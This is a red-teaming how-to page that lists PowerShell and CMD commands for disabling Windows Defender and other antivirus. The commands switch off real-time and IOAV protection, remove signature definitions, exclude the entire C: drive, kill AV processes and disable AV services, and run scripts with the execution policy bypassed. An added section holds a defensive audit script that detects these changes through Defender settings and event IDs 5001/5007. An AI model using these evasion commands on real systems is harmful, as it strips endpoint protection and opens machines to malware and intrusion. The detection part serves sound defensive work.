# Bypassing Windows Defender for Red Teaming Activity

### **To disable real-time-protection Windows Defender**

Fire up a PowerShell window as administrator and run the following command:

```powershell
Set-MpPreference -DisableRealtimeMonitoring $true
```

### **Disable Windows Defender from CMD and reset it to factory default (this removes all downloaded definitions)**

\*Admin rights are required.

The commands that need to be executed (the original ran both on one line; they are two separate commands):

```powershell
# MpCmdRun.exe -RemoveDefinitions -All wipes every downloaded signature set
& "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
# Turn off IOAV scanning of downloaded files and attachments
Set-MpPreference -DisableIOAVProtection $true
```

### **To add an Exception Directory and Process**

```powershell
Add-MpPreference -ExclusionPath "C:\"
Add-MpPreference -ExclusionProcess "c:\internal\test.exe"
```

Now if Defender comes back to life it will ignore C:\ even though its signatures will be updated.
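A defender-side check for the changes described in the three sections above, added here as an example and not part of the original post: it reads the live Defender configuration with `Get-MpPreference` and `Get-MpComputerStatus`, flags the settings those commands alter (real-time monitoring, IOAV scanning, whole-drive path exclusions, process exclusions, stale signatures), and pulls the events Defender itself logs when protection is switched off (5001) or its configuration changes (5007). The property names are documented cmdlet output; the seven-day lookback window and the "broad exclusion" pattern are assumptions.

```powershell
# Added example (not from the original page): audit a host for the Defender
# changes described above and surface the events they leave behind.
# Run in an elevated PowerShell session on the host being checked.

$pref   = Get-MpPreference
$status = Get-MpComputerStatus
$findings = @()

# 1. Protection switches flipped off by Set-MpPreference
if ($pref.DisableRealtimeMonitoring)       { $findings += 'Real-time monitoring is disabled' }
if ($pref.DisableIOAVProtection)           { $findings += 'IOAV (download/attachment) scanning is disabled' }
if (-not $status.RealTimeProtectionEnabled) { $findings += 'Status reports real-time protection OFF' }
if (-not $status.IsTamperProtected)        { $findings += 'Tamper Protection is OFF (Set-MpPreference changes are not blocked)' }

# 2. Exclusions that cover a whole drive or a system root (assumed pattern)
foreach ($path in @($pref.ExclusionPath)) {
    if ($path -match '^[A-Za-z]:\\?$' -or $path -match '^[A-Za-z]:\\(Windows|Users)\\?$') {
        $findings += "Overly broad path exclusion: $path"
    }
}
foreach ($proc in @($pref.ExclusionProcess)) {
    $findings += "Process exclusion present: $proc"
}

# 3. Stale signatures suggest -RemoveDefinitions or blocked updates
if ($status.AntivirusSignatureAge -gt 7) {
    $findings += "Signatures are $($status.AntivirusSignatureAge) days old"
}

# 4. Events Defender writes when protection or configuration changes
#    5001 = real-time protection disabled, 5007 = platform configuration changed
$since  = (Get-Date).AddDays(-7)   # assumed lookback window
$events = Get-WinEvent -FilterHashtable @{
    LogName   = 'Microsoft-Windows-Windows Defender/Operational'
    Id        = 5001, 5007
    StartTime = $since
} -ErrorAction SilentlyContinue

foreach ($e in $events) {
    $findings += ("[{0}] Event {1}: {2}" -f $e.TimeCreated, $e.Id, ($e.Message -split "`n")[0])
}

if ($findings.Count -eq 0) { 'No Defender tampering indicators found.' }
else { $findings | ForEach-Object { "FINDING: $_" } }
```

Forwarding the 5001/5007 events to a central log store gives the same signal fleet-wide without having to run the script on each host.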

### Terminate Anti-Virus Processes

```powershell
Taskkill /F /IM avprocess.exe
```

### Stop and Disable Anti-Virus Services

```powershell
net stop "service name"
```

### **To disable a Windows service**

```powershell
# Use sc.exe explicitly: in PowerShell, bare "sc" is an alias for Set-Content.
# The space after "start=" is required by sc's argument syntax.
sc.exe config "service name" start= disabled
```

### **Run a PowerShell .ps1 script from a shortcut, bypassing the execution policy, without opening a PowerShell terminal**

Right-click an empty area of your desktop and select Shortcut.
Paste the following into the 'Browse' box, replacing the path to the script with the actual path to the script you created.

```powershell
%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File "C:\Utilities\+Misc\tog.ps1"
```

Once you've created the shortcut, right-click it and select the 'Run as administrator' option. When you run the shortcut as administrator, the .ps1 script is executed.
